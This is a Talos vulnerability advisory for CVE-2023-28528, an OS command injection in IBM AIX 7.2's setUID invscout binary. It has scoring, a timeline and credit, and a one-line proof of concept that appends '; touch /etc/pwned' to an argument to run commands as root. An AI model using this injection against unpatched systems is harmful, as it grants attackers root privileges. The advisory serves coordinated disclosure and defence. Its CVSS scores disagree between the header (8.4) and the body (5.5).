Talos IntelligenceTALOS-2023-1691IBM Corporation AIX invscout SetUID Binary OS Command Injection Vulnerability
8.4 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.002 Low
EPSS
Percentile
57.0%
Talos Vulnerability Report
TALOS-2023-1691
IBM Corporation AIX invscout SetUID Binary OS Command Injection Vulnerability
April 24, 2023
CVE Number
CVE-2023-28528
SUMMARY
An OS command injection vulnerability exists in the invscout setUID binary functionality of IBM Corporation AIX 7.2. A specially-crafted command line argument can lead to execute privileged operation. An attacker can use arbitrary code execution to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
IBM Corporation AIX 7.2
PRODUCT URLS
AIX - <http://us.ibm.com>
CVSSv3 SCORE
5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
CWE
CWE-78 - Improper Neutralization of Special Elements used in an OS Command (βOS Command Injectionβ)
DETAILS
AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.
The invscout setUID binary has an undocumented parameter that can be used to request the installation of an arbitrary RPM. Furthermore, the mechanism by which the RPM is installed requires the supplied value to be concatenated into a string that is then passed into system().
Exploit Proof of Concept
The most trivial method of exploitatation to gain command execution takes the following form:
$ invscout -RPM ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm -o "-i ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm; touch /etc/pwned; echo " package info-6.7-1.ppc is already installed /var/adm/invscout/microcode/../../../../..//home/tmb/info-6.7-1.aix5.1.ppc.rpm $ ls -la /etc/pwned -rw-rw-rw- 1 root staff 0 Dec 18 12:59 /etc/pwned
Note: The umask is set to 0 prior to exploitation commencing.
TIMELINE
2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-12 - Vendor Patch Release
2023-04-24 - Public Release
Credit
Discovered by Tim Brown of Cisco Security Advisory EMEAR.
Vulnerability Reports Next Report
TALOS-2023-1693
Previous Report
TALOS-2023-1690
Related
8.4 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.002 Low
EPSS
Percentile
57.0%